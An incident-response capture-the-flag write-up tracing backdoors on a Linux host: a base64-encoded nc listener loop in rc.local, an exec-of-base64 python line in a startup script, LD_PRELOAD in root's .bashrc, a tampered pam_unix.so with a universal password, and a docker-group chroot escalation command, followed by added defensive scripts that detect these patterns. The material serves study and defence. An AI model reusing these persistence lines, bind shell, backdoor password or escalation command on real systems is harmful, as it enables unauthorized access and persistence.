Looking for light.

玄机 (Xuanji): Linux Backdoor Incident Response

Once logged in, let's look for the backdoor user. Reading the passwd file, we immediately spot a user called backdoor; wow, not even an attempt to hide it.


Next we use ps -ef to list every running process on the host and find nc -lvp 9999 -c flag{infoFl4g}. We then need to work out which configuration file launched the listener on port 9999. First we look at the process behind port 9999: ps -aux shows the command that started it.

user@ip-10-0-10-1:/var/log$ ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root       491     1  0 08:27 ?        00:00:00 bash
root       497  0.0  0.0   2368  1720 ?        S    08:27   0:00 nc -lvp 9999 -c

Using ps -p to inspect this process in more detail, its parent PID is 491, so we follow up on process 491. Since 491 is bash, it is reasonable to suspect the process is started automatically by the system. systemctl status shows the status of the services currently running.

user@ip-10-0-10-1:/etc/systemd$ systemctl status
● ip-10-0-10-1
    State: degraded
     Jobs: 0 queued
   Failed: 1 units
    Since: Mon 2025-04-07 08:26:05 EDT; 28min ago
   CGroup: /
           ├─docker
           │ ├─f413fc5c74dee344c5cfd7049f0fafd8f3d85ba157b8c560f1deb65bf144718e
           │ │ ├─1052 /bin/sh /var/www/start.sh
           │ │ ├─1091 php-fpm: master process (/usr/local/etc/php-fpm.conf)
           │ │ ├─1237 php-fpm: pool www
           │ │ └─1238 php-fpm: pool www
           │ └─045fc01553624d5fc8f27887fb69be1094700d24f29e13406b26933a62d0f614
           │   ├─1209 nginx: master process nginx -g daemon off;
           │   └─1298 nginx: worker process
           ├─user.slice
           │ └─user-1000.slice
           │   ├─user@1000.service
           │   │ └─init.scope
           │   │   ├─1394 /lib/systemd/systemd --user
           │   │   └─1395 (sd-pam)
           │   ├─session-2.scope
           │   │ ├─1391 sshd: user [priv]
           │   │ ├─1409 sshd: user@pts/0
           │   │ ├─1410 -sh
           │   │ ├─1420 python3 -c import pty;pty.spawn("/bin/bash")
           │   │ ├─1421 /bin/bash
           │   │ ├─1539 systemctl status
           │   │ └─1540 pager
           │   └─session-7.scope
           │     ├─1429 sshd: user [priv]
           │     ├─1435 sshd: user@notty
           │     ├─1436 sh -c /usr/lib/openssh/sftp-server
           │     └─1437 /usr/lib/openssh/sftp-server
           ├─init.scope
           │ └─1 /sbin/init
           └─system.slice
             ├─apache2.service
             │ ├─535 /usr/sbin/apache2 -k start
             │ ├─538 /usr/sbin/apache2 -k start
             │ └─539 /usr/sbin/apache2 -k start
             ├─systemd-udevd.service
             │ └─251 /lib/systemd/systemd-udevd
             ├─cron.service
             │ └─473 /usr/sbin/cron -f
             ├─docker-compose-app.service
             │ └─1277 python3
             ├─system-serial\x2dgetty.slice
             │ └─serial-getty@ttyS0.service
             │   └─628 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 tt
             ├─networking.service
             │ └─399 /sbin/dhclient -4 -v -i -pf /run/dhclient.eth0.pid -lf /var
             ├─docker.service
             │ ├─ 478 /usr/bin/dockerd
             │ ├─ 630 containerd --config /var/run/docker/containerd/containerd.
             │ ├─1033 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f413f
             │ ├─1100 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
             │ ├─1103 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 92
             │ ├─1116 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
             │ ├─1119 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 84
             │ ├─1132 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
             │ ├─1136 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 28
             │ ├─1151 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
             │ ├─1156 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 81
             │ └─1186 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 045fc
             ├─systemd-journald.service
             │ └─228 /lib/systemd/systemd-journald
             ├─ssh.service
             │ └─645 /usr/sbin/sshd -D
             ├─rsyslog.service
             │ └─474 /usr/sbin/rsyslogd -n -iNONE
             ├─rc-local.service
             │ ├─491 bash
             │ └─497 nc -lvp 9999 -c flag{infoFl4g}
             ├─dbus.service
             │ └─477 /usr/bin/dbus-daemon --system --address=systemd: --nofork -
             ├─systemd-timesyncd.service
             │ └─278 /lib/systemd/systemd-timesyncd
             ├─system-getty.slice
             │ └─getty@tty1.service
             │   └─629 /sbin/agetty -o -p -- \u --noclear tty1 linux
             └─systemd-logind.service
               └─476 /lib/systemd/systemd-logind

Note the processes under rc-local.service. Using find under /etc for files whose name contains rc.local, we eventually locate rc.local under rc.d.

user@ip-10-0-10-1:/etc/rc.d$ cat rc.local
#!/bin/bash
echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash &
exit 0

After base64 decoding, this turns out to be exactly the target service we were looking for. Next we need to find the log in which the attacker recorded every user's login password; after digging around, we find the .sshlog file under /tmp. From ps -aux we also find a python3 process belonging to user, PID 1277. Checking port information with netstat shows 8080 listening, so the RCE process is python3 on port 8080.

Next, find the name of the backdoor service that is enabled at boot.

user@ip-10-0-10-1:~$ systemctl list-unit-files --type=service | grep enable
apache2.service                        enabled        
apparmor.service                       enabled        
autovt@.service                        enabled        
cloud-config.service                   enabled        
cloud-final.service                    enabled        
cloud-init-local.service               enabled        
cloud-init.service                     enabled        
console-setup.service                  enabled        
cron.service                           enabled        
dbus-org.freedesktop.timesync1.service enabled        
docker-compose-app.service             enabled        
docker.service                         enabled        
getty@.service                         enabled        
keyboard-setup.service                 enabled        
networking.service                     enabled        
rc-local.service                       enabled        
rc.local.service                       enabled        
rsyslog.service                        enabled        
ssh.service                            enabled        
sshd.service                           enabled        
syslog.service                         enabled        
systemd-fsck-root.service              enabled-runtime
systemd-timesyncd.service              enabled

Use systemctl to inspect the docker-related service and locate the configuration file that starts it.

user@ip-10-0-10-1:~$ systemctl status docker-compose-app.service
● docker-compose-app.service - Docker Compose Application
   Loaded: loaded (/etc/systemd/system/docker-compose-app.service; enabled; vend
   Active: failed (Result: exit-code) since Mon 2025-04-07 08:28:04 EDT; 50min a
  Process: 1375 ExecStart=/bin/bash /usr/lib/python3.7/site-packages/docker/star
  Process: 1390 ExecStop=/usr/bin/docker-compose down (code=exited, status=203/E
 Main PID: 1375 (code=exited, status=0/SUCCESS)
    Tasks: 1 (limit: 2356)
   Memory: 45.0M
   CGroup: /system.slice/docker-compose-app.service

The /etc/systemd/system/docker-compose-app.service unit file checks out. We then look at the files under /usr/lib/python3.7/site-packages/docker.

user@ip-10-0-10-1:/usr/lib/python3.7/site-packages/docker$ cat startup.sh
#!/bin/bash
/usr/local/bin/docker-compose -f /home/user/nginx/docker-compose.yml up -d

echo 'import base64;v=base64.b64decode("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");exec(v)'|nohup python3 &

This is the file. Running linpeas.sh to check for privilege-escalation misconfigurations shows the user is in the docker group; following GTFOBins, the command below is all it takes.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
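Stepping back to the two start-up scripts found above (rc.local and startup.sh): before running anything they contain, a responder wants to see what the base64 blob actually says and to catch the same decode-and-pipe pattern wherever it appears. The following shell script is an added example, not code from the writeup or from the 玄机 platform; the two sample files are constructed from what the writeup shows, with the python3 blob (which the writeup elides) replaced by a placeholder, and the rc.local payload is decoded for inspection only, never executed.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup: triage boot-time scripts
# (rc.local, and the helper a unit's ExecStart points at) for payloads that are
# decoded or echoed straight into an interpreter, and decode any base64 blob
# for review WITHOUT executing it. Both sample scripts are constructed from what
# the writeup found; the python3 blob, which the writeup elides, is a stand-in.

# Print "reason:line-number:line" for every suspicious line in a script.
scan_startup_script() {
    script="$1"
    # command output piped into a shell or interpreter, possibly via nohup
    grep -nE '[|][[:space:]]*(nohup[[:space:]]+)?(bash|sh|python[23]?|perl)([[:space:]]|&|$)' "$script" \
        | sed 's/^/pipe-to-interpreter:/'
    grep -nE 'base64[[:space:]]+(-d|--decode)' "$script" | sed 's/^/base64-decode:/'
    grep -nE '(^|[[:space:]])nc[[:space:]]+-l' "$script" | sed 's/^/listener:/'
}

# Decode every long base64-looking token for inspection; nothing is run.
decode_b64_tokens() {
    grep -oE '[A-Za-z0-9+/]{40,}={0,2}' "$1" | while read -r tok; do
        if printf '%s' "$tok" | base64 -d 2>/dev/null; then printf '\n'; fi
    done
}

sample_dir=$(mktemp -d)
cat > "$sample_dir/rc.local" <<'EOF'
#!/bin/bash
echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash &
exit 0
EOF
cat > "$sample_dir/startup.sh" <<'EOF'
#!/bin/bash
/usr/local/bin/docker-compose -f /home/user/nginx/docker-compose.yml up -d

echo 'import base64;v=base64.b64decode("BLOB_ELIDED_IN_WRITEUP");exec(v)'|nohup python3 &
EOF

for f in "$sample_dir/rc.local" "$sample_dir/startup.sh"; do
    echo "== $f"
    scan_startup_script "$f"
    echo "-- decoded payloads:"
    decode_b64_tokens "$f"
done
```

For rc.local the decoded payload is the persistence loop itself: while true;do nohup nc -lvp 9999 -c "flag{infoFl4g}" 2>&1 ;sleep 1;done; which explains why killing the listener alone does not help.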

Use journalctl to view all logs and try to extract the flag from them.

root@d4969ec3d498:/home# journalctl | grep flag
Apr 07 08:28:00 ip-10-0-10-1 rc.local[479]: eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 9001
Apr 07 08:28:00 ip-10-0-10-1 rc.local[479]: lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
Apr 07 08:28:01 ip-10-0-10-1 CRON[960]: (root) CMD (echo flag{cr0nt4b_IRfind};^Mno crontab for root                                                                                                   )
Apr 07 08:29:01 ip-10-0-10-1 CRON[1423]: (root) CMD (echo flag{cr0nt4b_IRfind};^Mno crontab for root

We need to investigate the attacker-planted behaviour whereby running cat as root deletes a specified file. We need to check root's aliases, i.e. the .bashrc and .bash_profile of the target user, to see whether the user's startup files have been modified to carry out the malicious action.

# ~/.bashrc: executed by bash(1) for non-login shells.

# Note: PS1 and umask are already set in /etc/profile. You should not
# need this unless you want different defaults for root.
# PS1='${debian_chroot:+($debian_chroot)}\h:\w\$ '
# umask 022

# You may uncomment the following lines if you want `ls' to be colorized:
# export LS_OPTIONS='--color=auto'
# eval "`dircolors`"
# alias ls='ls $LS_OPTIONS'
# alias ll='ls $LS_OPTIONS -l'
# alias l='ls $LS_OPTIONS -lA'
export LD_PRELOAD=/home/user/Nomal.so
# Some more alias to avoid making mistakes:
# alias rm='rm -i'
# alias cp='cp -i'
# alias mv='mv -i'

We find LD_PRELOAD pointing to a .so file. Next we look at the contents of that file. I don't know how to use IDA, but IDA is needed to decompile it and view its contents.
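To find this kind of injection systematically rather than by reading .bashrc by eye, the following shell script is an added example, not code from the writeup: it pulls every active LD_PRELOAD line from an account's start-up files and from /etc/ld.so.preload, and reports whether each library lives outside the system library directories or is world-writable. The fake root, the function names and the file contents are constructed; only the /home/user/Nomal.so path comes from the writeup.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup: audit an account's shell
# start-up files and the system-wide /etc/ld.so.preload for LD_PRELOAD
# injection, then classify each preloaded library by location and writability.
# Paths are resolved under a fake root so the check runs offline; the fake root
# is constructed to mirror the writeup's root .bashrc (LD_PRELOAD=/home/user/Nomal.so).

# Print "source:line:library" for every active (non-comment) LD_PRELOAD entry.
find_ld_preload() {
    root="$1" home="$2"
    for f in "$root$home/.bashrc" "$root$home/.bash_profile" "$root$home/.profile"; do
        [ -f "$f" ] || continue
        grep -nE '^[[:space:]]*(export[[:space:]]+)?LD_PRELOAD=' "$f" \
            | sed -E "s|^([0-9]+):.*LD_PRELOAD=[\"']?([^\"' ]+).*|${f#$root}:\1:\2|"
    done
    # /etc/ld.so.preload hooks every dynamically linked program, not only shells
    if [ -f "$root/etc/ld.so.preload" ]; then
        grep -nvE '^[[:space:]]*(#|$)' "$root/etc/ld.so.preload" | sed 's|^|/etc/ld.so.preload:|'
    fi
}

# Classify one library: a path outside the system library directories, a
# missing file, or a world-writable file each deserve a closer look.
assess_preload_lib() {
    root="$1" lib="$2"
    case "$lib" in
        /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) loc="system-dir" ;;
        *) loc="non-standard-dir" ;;
    esac
    if [ ! -e "$root$lib" ]; then state="missing"
    elif [ -n "$(find "$root$lib" -maxdepth 0 -perm -002)" ]; then state="world-writable"
    else state="present"
    fi
    printf '%s %s %s\n' "$lib" "$loc" "$state"
}

fake_root=$(mktemp -d)
mkdir -p "$fake_root/root" "$fake_root/home/user" "$fake_root/etc"
cat > "$fake_root/root/.bashrc" <<'EOF'
# ~/.bashrc: executed by bash(1) for non-login shells.
# alias ls='ls $LS_OPTIONS'
export LD_PRELOAD=/home/user/Nomal.so
EOF
printf '/home/user/Nomal.so\n' > "$fake_root/etc/ld.so.preload"
printf 'constructed stand-in for the planted shared object\n' > "$fake_root/home/user/Nomal.so"
chmod 666 "$fake_root/home/user/Nomal.so"
find_ld_preload "$fake_root" /root | while IFS=: read -r src line lib; do
    echo "$src:$line -> $(assess_preload_lib "$fake_root" "$lib")"
done
```

On a live host, run it against the real root (pass / and the home of each account that can run privileged commands) and treat any library under /home, /tmp or /dev/shm as a finding regardless of its name.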

Finally, the attacker set up a universal (backdoor) password, which suggests the attacker tampered with pam_unix.so; decompiling it with IDA yields the universal password ATMB6666. While we're at it, let's learn about the Linux persistence technique of PAM backdoor-password login.
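Decompiling is one way to confirm the tampering; a quicker first check is whether pam_unix.so still matches the hash the package manager recorded for it at install time. The following shell script is an added example, not code from the writeup: it performs the md5sums comparison that dpkg -V libpam-modules (or rpm -V pam) does, over a constructed fake root in which pam_unix.so has been altered; the fake root, the hash list and the function name are all constructed.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup: check PAM modules against
# the checksums the package manager recorded at install time, the same idea as
# `dpkg -V libpam-modules` or `rpm -V pam`, to catch a rebuilt pam_unix.so.
# The fake root and its md5sums list are constructed here; on a real Debian
# host the list lives under /var/lib/dpkg/info/ (libpam-modules:amd64.md5sums).

# Read "md5  relative/path" lines (dpkg's md5sums layout) and report every file
# under $root that is missing or whose current hash no longer matches.
verify_pkg_files() {
    root="$1" list="$2"
    while read -r expected path; do
        [ -n "$path" ] || continue
        file="$root/$path"
        if [ ! -f "$file" ]; then
            printf 'MISSING /%s\n' "$path"
            continue
        fi
        actual=$(md5sum "$file" | cut -d' ' -f1)
        [ "$actual" = "$expected" ] || printf 'MODIFIED /%s\n' "$path"
    done < "$list"
}

pam_root=$(mktemp -d)
sec="$pam_root/lib/x86_64-linux-gnu/security"
mkdir -p "$sec"
printf 'constructed stand-in for the packaged pam_unix.so\n' > "$sec/pam_unix.so"
printf 'constructed stand-in for the packaged pam_permit.so\n' > "$sec/pam_permit.so"
# Record the known-good hashes before anything is touched.
( cd "$pam_root" && md5sum lib/x86_64-linux-gnu/security/*.so ) > "$pam_root/libpam-modules.md5sums"
# Simulate the tampering: pam_unix.so is swapped for a rebuilt module.
printf 'rebuilt module with an extra password comparison\n' >> "$sec/pam_unix.so"

echo "== package files that no longer match their recorded hash:"
verify_pkg_files "$pam_root" "$pam_root/libpam-modules.md5sums"
```

The md5sums list on a compromised host can itself have been edited, so when the result matters, compare against the hashes of a freshly downloaded copy of the package instead.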